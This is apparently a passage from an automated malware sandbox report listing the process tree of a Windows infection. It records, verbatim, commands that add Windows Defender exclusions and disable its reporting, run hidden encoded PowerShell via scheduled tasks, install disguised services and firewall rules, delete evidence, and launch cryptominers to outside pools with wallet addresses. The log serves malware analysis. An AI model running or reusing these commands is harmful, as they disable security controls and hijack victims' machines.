- Creates scheduled task(s)
PID:5908

C:\Users\Admin\Documents\gf6DMjXfw45Uk7NQYk9AQ6j_.exe
"C:\Users\Admin\Documents\gf6DMjXfw45Uk7NQYk9AQ6j_.exe"
3⤵
PID:540

C:\Users\Admin\AppData\Local\Temp\7zS2004.tmp\Install.exe
.\Install.exe
4⤵
PID:6516

C:\Users\Admin\AppData\Local\Temp\7zS3A14.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
PID:7144

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:1288

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:5988

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:5232

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
8⤵
PID:684

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:6500

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ghLmpdWRu" /SC once /ST 11:01:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:5908

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ghLmpdWRu"
6⤵
PID:4412

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ghLmpdWRu"
6⤵
PID:2204

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 18:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\kzyFOdK.exe\" j6 /site_id 525403 /S" /V1 /F
6⤵
- Creates scheduled task(s)
PID:1296

C:\Users\Admin\Documents\opsoyqR2aQFQIkNZUtxUK2hg.exe
"C:\Users\Admin\Documents\opsoyqR2aQFQIkNZUtxUK2hg.exe"
3⤵
PID:3576

C:\Users\Admin\Documents\kwsPtNuXZWXy23mq2Na6RJ6Z.exe
"C:\Users\Admin\Documents\kwsPtNuXZWXy23mq2Na6RJ6Z.exe"
3⤵
PID:5764

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:212

C:\Users\Admin\Documents\de_dqPXvbTf1GOc0gkoSVjTk.exe
"C:\Users\Admin\Documents\de_dqPXvbTf1GOc0gkoSVjTk.exe"
3⤵
PID:5796

C:\Users\Admin\AppData\Local\Temp\ab0042c0-1792-463c-ae6b-4289610c41a9.exe
"C:\Users\Admin\AppData\Local\Temp\ab0042c0-1792-463c-ae6b-4289610c41a9.exe"
4⤵
PID:6864

C:\Users\Admin\Documents\ZIFbyv_i19wbECLeDh6sz7hU.exe
"C:\Users\Admin\Documents\ZIFbyv_i19wbECLeDh6sz7hU.exe"
3⤵
PID:4432

C:\Users\Admin\Documents\ZIFbyv_i19wbECLeDh6sz7hU.exe
"C:\Users\Admin\Documents\ZIFbyv_i19wbECLeDh6sz7hU.exe"
4⤵
PID:4808

C:\Users\Admin\Documents\NcIvtNJzfxfQPDM_1hPpUQbL.exe
"C:\Users\Admin\Documents\NcIvtNJzfxfQPDM_1hPpUQbL.exe"
3⤵
PID:3288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3288 -s 2240
4⤵
- Program crash
PID:7128

C:\Users\Admin\Documents\B8xLd1qqeIXd2B3T3_zjOdAb.exe
"C:\Users\Admin\Documents\B8xLd1qqeIXd2B3T3_zjOdAb.exe"
3⤵
PID:6012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 900
4⤵
- Program crash
PID:6240

C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
"C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5060

C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
3⤵
PID:3884

C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
3⤵
PID:4996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4996 -s 488
4⤵
- Program crash
PID:932

C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
3⤵
PID:4060

C:\Users\Admin\AppData\Local\Temp\Litever01.exe
"C:\Users\Admin\AppData\Local\Temp\Litever01.exe"
2⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2756

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:1572

C:\Users\Admin\AppData\Local\Temp\Complete.exe
"C:\Users\Admin\AppData\Local\Temp\Complete.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5044

C:\Users\Admin\Documents\pMsTSUnSX5x24ILOaxbyfnXk.exe
"C:\Users\Admin\Documents\pMsTSUnSX5x24ILOaxbyfnXk.exe"
3⤵
PID:5012

C:\Users\Admin\AppData\Local\Temp\21c1e6f7-2b04-4e39-a6e5-7690a331f0ce.exe
"C:\Users\Admin\AppData\Local\Temp\21c1e6f7-2b04-4e39-a6e5-7690a331f0ce.exe"
4⤵
PID:6124

C:\Users\Admin\Documents\C46PkjzQqFBRgV0s8_uu3bbP.exe
"C:\Users\Admin\Documents\C46PkjzQqFBRgV0s8_uu3bbP.exe"
3⤵
PID:4720

C:\Users\Admin\AppData\Roaming\program5214\program5214.exe
"C:\Users\Admin\AppData\Roaming\program5214\program5214.exe"
4⤵
PID:3352

C:\Users\Admin\Documents\t6HQ2vboyOyxkaX5S19GD5js.exe
"C:\Users\Admin\Documents\t6HQ2vboyOyxkaX5S19GD5js.exe"
3⤵
PID:1000

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
4⤵
PID:744

C:\Users\Admin\Documents\E1eNDheMY2JAvCqgWxqj8K_8.exe
"C:\Users\Admin\Documents\E1eNDheMY2JAvCqgWxqj8K_8.exe"
3⤵
PID:3148

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
4⤵
PID:5196

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:5480

C:\Users\Admin\Documents\BYvy6gsX2IznVpM79JfjjrZU.exe
"C:\Users\Admin\Documents\BYvy6gsX2IznVpM79JfjjrZU.exe"
3⤵
PID:2536

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im BYvy6gsX2IznVpM79JfjjrZU.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\BYvy6gsX2IznVpM79JfjjrZU.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:3772

C:\Windows\SysWOW64\taskkill.exe
taskkill /im BYvy6gsX2IznVpM79JfjjrZU.exe /f
5⤵
- Kills process with taskkill
PID:1620

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:3492

C:\Users\Admin\Documents\gCHRllpk3XBkgRqIho8AlQlp.exe
"C:\Users\Admin\Documents\gCHRllpk3XBkgRqIho8AlQlp.exe"
3⤵
PID:5144

C:\Users\Admin\Documents\z3ZkSK2mvsHl6BAKreJvVkgx.exe
"C:\Users\Admin\Documents\z3ZkSK2mvsHl6BAKreJvVkgx.exe"
3⤵
PID:5260

C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe
"C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"
4⤵
PID:6148

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
4⤵
PID:6876

C:\Users\Admin\Documents\DJHkuzNSCP3QGeRAZqgcCotZ.exe
"C:\Users\Admin\Documents\DJHkuzNSCP3QGeRAZqgcCotZ.exe"
3⤵
PID:5188

C:\Users\Admin\AppData\Local\Temp\7zSC8DB.tmp\Install.exe
.\Install.exe
4⤵
PID:5916

C:\Users\Admin\AppData\Local\Temp\7zSDFCE.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
PID:3496

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:4052

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:6720

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:5944

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
8⤵
PID:1612

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:6268

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:5800

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:3476

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
8⤵
PID:6800

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gKjDMamFN" /SC once /ST 16:21:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:3184

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gKjDMamFN"
6⤵
PID:5684

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gKjDMamFN"
6⤵
PID:2620

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 18:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\wdmEpDO.exe\" j6 /site_id 525403 /S" /V1 /F
6⤵
- Creates scheduled task(s)
PID:5380

C:\Users\Admin\Documents\5WlMHDUEWHAVy_Aw1i_M5EId.exe
"C:\Users\Admin\Documents\5WlMHDUEWHAVy_Aw1i_M5EId.exe"
3⤵
PID:1040

C:\Users\Admin\Documents\5WlMHDUEWHAVy_Aw1i_M5EId.exe
"C:\Users\Admin\Documents\5WlMHDUEWHAVy_Aw1i_M5EId.exe"
4⤵
PID:2984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 564
5⤵
- Program crash
PID:3888

C:\Users\Admin\Documents\Gk7LfxgfVhzrK8RaCETcWtfK.exe
"C:\Users\Admin\Documents\Gk7LfxgfVhzrK8RaCETcWtfK.exe"
3⤵
PID:1540

C:\Users\Admin\Documents\snvTUe5lt4Kc0872cSIKg952.exe
"C:\Users\Admin\Documents\snvTUe5lt4Kc0872cSIKg952.exe"
3⤵
PID:2200

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:5724

C:\Users\Admin\Documents\CmJ2zUXwFNRgnDbFWZ0_I7Mg.exe
"C:\Users\Admin\Documents\CmJ2zUXwFNRgnDbFWZ0_I7Mg.exe"
3⤵
PID:2056

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ltomkzuj.exe" C:\Windows\SysWOW64\sbkahyyr\
4⤵
PID:1492

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\sbkahyyr\
4⤵
PID:5976

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create sbkahyyr binPath= "C:\Windows\SysWOW64\sbkahyyr\ltomkzuj.exe /d\"C:\Users\Admin\Documents\CmJ2zUXwFNRgnDbFWZ0_I7Mg.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:6352

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description sbkahyyr "wifi internet conection"
4⤵
PID:6764

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start sbkahyyr
4⤵
PID:6980

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:1612

C:\Users\Admin\Documents\Ji4tg3xODBSnykKJOE00uuLf.exe
"C:\Users\Admin\Documents\Ji4tg3xODBSnykKJOE00uuLf.exe"
3⤵
PID:1148

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:4788

C:\Users\Admin\AppData\Local\Temp\test.exe
"C:\Users\Admin\AppData\Local\Temp\test.exe"
5⤵
PID:2252

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -a TON --pool wss://eu1.stratum.ton-pool.com/stratum --user UQBoMIYmX6zYTKyRLaph1PjCMfxSLWTbiAw_qqTHLnbMhzWF
6⤵
PID:6188

C:\Windows\notepad.exe
C:\Windows\notepad.exe --coin=XMR -o xmr-eu1.nanopool.org:14444 -u 44W9eLcymm66Eie5AyD11jYW1DaJ4GTHzZEu1QELPGS3U9vKtWEyUCaCFwhn4af8zjeQ2MWeuLgCVDTjAjiGUbyYAtQBvC1 -p 10k instllov
6⤵
PID:6768

C:\Windows\explorer.exe
C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "new" "ton"
6⤵
PID:7092

C:\Users\Admin\Documents\depIRPXaBcBVNG2fNvs28o2a.exe
"C:\Users\Admin\Documents\depIRPXaBcBVNG2fNvs28o2a.exe"
3⤵
PID:3924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 468
4⤵
- Program crash
PID:4584

C:\Users\Admin\Documents\PFH9QEBHcaf6V7PDVuszD0UT.exe
"C:\Users\Admin\Documents\PFH9QEBHcaf6V7PDVuszD0UT.exe"
3⤵
PID:5056

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:6028

C:\Users\Admin\Documents\kUJCwmhaf1LMu4wu3QB22Y4R.exe
"C:\Users\Admin\Documents\kUJCwmhaf1LMu4wu3QB22Y4R.exe"
3⤵
PID:1208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1208 -s 916
4⤵
- Program crash
PID:6484

C:\Users\Admin\Documents\ZcFmoaFtKcbvTKLuwMYn3EJy.exe
"C:\Users\Admin\Documents\ZcFmoaFtKcbvTKLuwMYn3EJy.exe"
3⤵
PID:4052

C:\Users\Admin\Documents\YBXuJnDqJGmEsY2o7kQrLiyx.exe
"C:\Users\Admin\Documents\YBXuJnDqJGmEsY2o7kQrLiyx.exe"
3⤵
PID:1160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 632
4⤵
- Program crash
PID:5872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 648
4⤵
- Program crash
PID:6316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 656
4⤵
- Program crash
PID:6196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 776
4⤵
- Program crash
PID:6740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 1260
4⤵
- Program crash
PID:6648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 1268
4⤵
- Program crash
PID:4788

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "YBXuJnDqJGmEsY2o7kQrLiyx.exe" /f & erase "C:\Users\Admin\Documents\YBXuJnDqJGmEsY2o7kQrLiyx.exe" & exit
4⤵
PID:408

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "YBXuJnDqJGmEsY2o7kQrLiyx.exe" /f
5⤵
- Kills process with taskkill
PID:5988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 1336
4⤵
- Program crash
PID:3016

C:\Users\Admin\Documents\OuC0USumplGchL0k2dJbNenx.exe
"C:\Users\Admin\Documents\OuC0USumplGchL0k2dJbNenx.exe"
3⤵
PID:3772

C:\Users\Admin\Documents\8fSMY6sYCVGuqEId7ZorLTal.exe
"C:\Users\Admin\Documents\8fSMY6sYCVGuqEId7ZorLTal.exe"
3⤵
PID:3288

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:5684

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4996

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3884

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
- Loads dropped DLL
PID:1996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 600
3⤵
- Program crash
PID:4152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1996 -ip 1996
1⤵
PID:4476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1484 -ip 1484
1⤵
PID:2152

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4996 -ip 4996
1⤵
PID:3936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3924 -ip 3924
1⤵
PID:5784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1160 -ip 1160
1⤵
PID:6012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 460
1⤵
- Program crash
PID:5872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 624
1⤵
- Program crash
PID:6056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3924 -ip 3924
1⤵
- Executes dropped EXE
PID:4996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1160 -ip 1160
1⤵
PID:1108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1160 -ip 1160
1⤵
PID:4944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1208 -ip 1208
1⤵
PID:6300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2984 -ip 2984
1⤵
PID:2876

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:6364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5136 -ip 5136
1⤵
PID:6428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1160 -ip 1160
1⤵
PID:7068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5804 -ip 5804
1⤵
PID:7032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5136 -ip 5136
1⤵
PID:1488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6012 -ip 6012
1⤵
PID:6456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4808 -ip 4808
1⤵
PID:6916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5804 -ip 5804
1⤵
PID:5832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 3288 -ip 3288
1⤵
PID:6772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 1160 -ip 1160
1⤵
PID:5380

C:\Windows\SysWOW64\sbkahyyr\ltomkzuj.exe
C:\Windows\SysWOW64\sbkahyyr\ltomkzuj.exe /d"C:\Users\Admin\Documents\CmJ2zUXwFNRgnDbFWZ0_I7Mg.exe"
1⤵
PID:3336

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Windows\TEMP\zcsrkmtw.exe" C:\Windows\SysWOW64\adxzsglt\
2⤵
PID:6408

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config adxzsglt binPath= "C:\Windows\SysWOW64\adxzsglt\zcsrkmtw.exe /d\"C:\Windows\SysWOW64\sbkahyyr\ltomkzuj.exe\""
2⤵
PID:6820

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start adxzsglt
2⤵
PID:3948

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
2⤵
PID:964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5804 -ip 5804
1⤵
PID:5728

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
1⤵
PID:6452

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
2⤵
PID:5408

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
2⤵
PID:4880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1160 -ip 1160
1⤵
PID:1108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5804 -ip 5804
1⤵
PID:5308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 1160 -ip 1160
1⤵
PID:6928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 5804 -ip 5804
1⤵
PID:5128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:6580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:3784

C:\Windows\SysWOW64\adxzsglt\zcsrkmtw.exe
C:\Windows\SysWOW64\adxzsglt\zcsrkmtw.exe /d"C:\Windows\SysWOW64\sbkahyyr\ltomkzuj.exe"
1⤵
PID:1756

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Windows\TEMP\wrgcwywr.exe" C:\Windows\SysWOW64\adxzsglt\
2⤵
PID:6544

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config adxzsglt binPath= "C:\Windows\SysWOW64\adxzsglt\wrgcwywr.exe /d\"C:\Windows\SysWOW64\adxzsglt\zcsrkmtw.exe\""
2⤵
PID:4996

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start adxzsglt
2⤵
PID:2432

C:\Windows\SysWOW64\netsh.exe
